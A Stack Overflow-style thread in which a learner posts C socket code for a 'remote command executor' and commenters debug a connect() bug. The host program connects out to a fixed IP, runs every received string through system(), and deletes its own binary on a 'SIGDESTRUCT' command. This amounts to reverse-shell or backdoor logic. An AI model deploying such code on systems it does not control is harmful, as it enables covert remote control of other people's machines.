# What's wrong with my remote command executor?

Tags: c, sockets

I coded two programs. One is the client, the other one is the program the host has to run.

`client.c`

```
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define COMMAND_LIMIT 1024
//#define RECEIVE_LIMIT 500
#define zero(_P) memset(&_P,0,sizeof(_P))
int main(int argc, char **argv){
    if(argc==1){
        puts("format: [executable] [port]");
        return 0;
    }
    int port=atoi(*(argv+1));
    char send_buffer[COMMAND_LIMIT+1];
    //char receive_buffer[RECEIVE_LIMIT];
    struct sockaddr_in server;
    zero(server);
    server.sin_family=AF_INET;    
    server.sin_addr.s_addr=htonl(INADDR_ANY); 
    server.sin_port=htons(port);
    int listener, connector;
    listener=socket(AF_INET, SOCK_STREAM, 0);
    bind(listener, (struct sockaddr*)&server,sizeof(server));
    if(listen(listener, 1) == -1){
        puts("Failed to listen");
        return -1;
    }
    connector=accept(listener, (struct sockaddr*)NULL ,NULL);
    puts("Host found."); 
    while(1){
        puts("Enter command:");
        scanf("%s",send_buffer);
        int wrlen=write(connector,send_buffer,strlen(send_buffer));
        if(wrlen==-1){
            printf("Connection has been closed. Stopping program.");
            close(connector);
            return 0;
        }
    }
    return 0;
}
```

`host.c`

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define PORT 2333 //default port, change it.
#define RECEIVE_LIMIT 1024
#define CLIENT_IP "127.0.0.1" //changed this for stackoverflow
#define zero(_P) memset(&_P,0,sizeof(_P))
int main(int argc, char **argv){
    int sockets, n=0;
    char receive_buffer[RECEIVE_LIMIT+1];
    struct sockaddr_in self; 
    memset(receive_buffer, '0' ,sizeof(receive_buffer));
    if((sockets = socket(AF_INET, SOCK_STREAM, 0))< 0){
        puts("Error : Could not create socket.");
        return 1;
    }
    self.sin_family=AF_INET;
    self.sin_port=htons(PORT);
    self.sin_addr.s_addr=inet_addr(CLIENT_IP);
    if(connect(sockets, (struct sockaddr *)&self, sizeof(self)<0)){
      printf("\n Error : Connect Failed \n");
      return 1;
    }
    while((n = read(sockets, receive_buffer, sizeof(receive_buffer)-1)) > 0){
        if(n<0){
            printf("\n Read Error \n");
        }
        receive_buffer[n]='\0';
        if(strcmp("SIGDESTRUCT",receive_buffer)==0){
            remove(argv[0]);
            return 0;
        }
        system(receive_buffer);
      printf("\n");
    }
  return 0;
}
```

The client runs fine but host.c can't connect to client.c. Both compiled though, without any errors.  I tried to debug it, but everything looks fine to me. The client allows every address to connect to it and the host tries to connect to it.

Comment: Server/host is the one that is listening. Client is the one to connect to it.

Comment: ... at least, that's the conventional terminology.  You would do well to be consistent with that, else you will confuse people, possibly including future you.

Comment: Please show the command you use to start the client.  Also note that even if the `connect` succeeds TCP data is a simple byte stream so there's no guarantee that a single write of N bytes from the client will correspond to a read of N bytes on the host -- which your code seems to assume.

Comment: But even from a functionality perspective, it seems backward to imagine that a remote execution service would operate by the machine on which the commands are to run reaching out to some other machine (how is it supposed to know which one or when?) to request commands.  It's not altogether implausible, but in that case I would characterize the machine providing the commands as a command *server*, and the one requesting them as its client.

Comment: As I said, @Gerhardh, not altogether implausible.  My imagined use case was along the lines of a configuration management system such as Puppet or Ansible, though neither of those do precisely what the OP is trying to do.

Comment: This: `connect(sockets, (struct sockaddr *)&self, sizeof(self)<0)` should be: `connect(sockets, (struct sockaddr *)&self, sizeof(self))<0`.  Note that like many library functions, when `connect()` fails, it sets `errno` to a code indicative of the nature of the problem.  There are several ways to use that, but a simple one would be to use `perror()` to print a corresponding diagnostic to `stderr`.  Doing so would have clued you in to where to look for the issue.

Comment: @EugeneSh. Hello, did you even see the code? The only thing you corrected is the grammar

Comment: @Gerhardh I'm learning about sockets. This is the project I wanted to code because it actually serves a purpose(Not for botnets). Wouldn't a botnet make itself a service? Wouldn't there be more code for hiding things?

Answer (score 0):

guys. My problem has been solved. It was a faulty if statement in host.c

Comment: As it’s currently written, your answer is unclear. Please [edit] to add additional details that will help others understand how this addresses the question asked. You can find more information on how to write good answers [in the help center](/help/how-to-answer).